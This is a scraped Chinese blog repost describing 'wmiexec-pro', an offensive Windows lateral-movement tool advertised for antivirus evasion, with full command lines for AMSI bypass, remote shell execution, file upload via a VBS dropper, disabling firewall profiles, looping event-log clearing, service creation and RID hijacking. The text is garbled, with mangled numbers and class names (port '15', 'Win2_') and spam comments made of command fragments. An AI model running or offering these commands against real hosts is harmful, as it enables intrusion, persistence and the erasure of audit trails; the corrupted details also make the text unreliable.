【神兵利器】新一代wmiexec免杀横向工具
【神兵利器】新一代wmiexec免杀横向工具
项目介绍新一代wmiexec.py且具备更多新特性,整个操作只与端口15(不需要smb连接)一起工作,用于横向移动中的AV闪避(Windows Defender,火绒,60)项目特点主要功能:AV闪避主要特性:不需要win2_process主要特点:只需要15端口。新模块:AMSI旁路新模块:文件传输新模块:通过wmi类方法远程启用RDP新模块
【神兵利器】新一代wmiexec免杀横向工具
项目介绍
新一代wmiexec.py且具备更多新特性,整个操作只与端口15(不需要smb连接)一起工作,用于横向移动中的AV闪避(Windows Defender,火绒,60)
项目特点
- 主要功能:AV闪避
- 主要特性:不需要win2_process
- 主要特点:只需要15端口。
- 新模块:AMSI旁路
- 新模块:文件传输
- 新模块:通过wmi类方法远程启用RDP
- 新模块:Windows防火墙滥用
- 新模块:事件日志循环清理
- 新模块:远程启用WinRM,无需触摸CMD
- 新模块:服务经理
- 新模块:RID-劫持
- 增强:以新的方式获得命令执行输出
- 增强功能:执行vbs文件
项目使用
代码语言:javascript代码运行次数:0运行复制python wmiexec-pro.py [[domain/]username[:password]@]<targetame or address> module -h
Basic enumeration:
python wmiexec-pro.py administrator:password@192.168.1.1 enum -run
Enable/disable amsi bypass:
python wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable
python wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable
Execute command:
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with output mode)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 200)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS, such as server 200)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output and save output to file)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove temporary class for command result storage)
Filetransfer:
python wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./" -dest-file "C:\windows\temp\" (Upload file over 512KB)
python wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:\windows\temp\" -dest-file "/tmp/" (Download file over 512KB)
python wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove temporary class for file transfer)
RDP:
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto configure firewall)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old version OS, such as server 200)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 200)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old version OS, such as server 200, not support old version OS, such as server 200)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)
WinRM (Only support win7+):
python wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable
python wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable
Firewall (Only support win8+):
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)
Services:
python wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system2\'
python wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system2\' -class "Win2_TerminalService" (Create service via alternative class)
python wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json
Eventlog:
python wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Looping cleaning eventlog)
python wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop looping cleaning eventlog)
RID Hijack:
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissi for SAM/SAM subkey in registry)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old version OS, such as server 200)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate user)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate user)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (This will save user profile data as json file)
python wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
python wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
帮助信息:
命令执行:
文件传输:
工作机制
- AMSI模块:来自黑帽亚洲2018的Tal-Liberman的技术
- 执行命令模块:以前项目的增强:wmiexec-RegOut,从wmi类而不是从注册表中获取输出
- 文件传输模块:对于上传:将源文件以base64字符串的形式编码到名为WriteFile.vbs的滴管中,然后创建一个新的ActiveScriptEventCumer对象实例来执行该滴管。
- 下载:remote创建一个存储数据的类,然后执行编码器LocalFileIntoClass.vbs对文件进行编码,并将数据存储到刚刚创建的类中。
- rdp模块:对于启用/禁用:rdp服务:直接控制TerminalServices对象。
- 对于启用/禁用:受限管理模式:通过StdRegProv类控制注册表项DisableRestrictedAdmin。
- winrm模块:启用/禁用:调用服务模块
- 对于防火墙规则:使用firewall.py模块配置winrm的防火墙。
- 防火墙模块:滥用MSFT _网络协议端口过滤器,MSFT _网络防火墙规则,MSFT _网络防火墙配置文件类。
- 服务模块:滥用Win2_Service类。
- 事件日志模块:执行vbs脚本文件ClearEventlog.vbs,而不删除事件和使用者。
- 执行-vbs模块:选自wmipersist.py。
- classMethodEx方法:对于创建类:执行vbs scritp : CreateClass.vbs来创建简单的类。(为什么?不知道如何在impacket中使用PutClass方法。)
- 对于移除类:调用DeleteClass方法来移除类
免责声明
仅限用于技术研究和获得正式授权的攻防项目,请使用者遵守《中华人民共和国网络安全法》,切勿用于任何非法活动,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律连带责任
本文参与 腾讯云自媒体同步曝光计划,分享自。原始发表:2025-01-07,如有侵权请联系 cloudcommunity@tencent 删除防火墙python服务工具事件#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格
上传时间: 2025-07-22 21:21:42
推荐阅读
| 留言与评论(共有 15 条评论) |
| 本站网友 怎么样去粉刺 | 5分钟前 发表 |
| such as server 200) python wmiexec-pro.py administrator | |
| 本站网友 河南富士康招聘信息 | 25分钟前 发表 |
| password@192.168.1.1 eventlog -risk-i-know (Looping cleaning eventlog) python wmiexec-pro.py administrator | |
| 本站网友 黄金价钱走势图 | 10分钟前 发表 |
| AMSI旁路新模块 | |
| 本站网友 厦门妇科医院 | 6分钟前 发表 |
| \windows\system2\' -class "Win2_TerminalService" (Create service via alternative class) python wmiexec-pro.py administrator | |
| 本站网友 孕妇手机 | 15分钟前 发表 |
| password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500) python wmiexec-pro.py administrator | |
| 本站网友 在线对对联 | 9分钟前 发表 |
| 受限管理模式 | |
| 本站网友 联苯苄唑 | 18分钟前 发表 |
| 下载 | |
| 本站网友 点评团购网 | 14分钟前 发表 |
| password@192.168.1.1 service -action manual-start -service-name "test" python wmiexec-pro.py administrator | |
| 本站网友 他克莫司软膏 | 26分钟前 发表 |
| rdp模块 | |
| 本站网友 烤乳猪 | 30分钟前 发表 |
| password@192.168.1.1 winrm -enable python wmiexec-pro.py administrator | |
| 本站网友 人体结构组织图 | 11分钟前 发表 |
| rdp模块 | |
| 本站网友 电脑机器码 | 24分钟前 发表 |
| password@192.168.1.1 service -action disable -service-name "test" python wmiexec-pro.py administrator | |
| 本站网友 色迷迷 | 17分钟前 发表 |
| password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS | |
| 本站网友 65岁退休 | 10分钟前 发表 |
| python wmiexec-pro.py administrator | |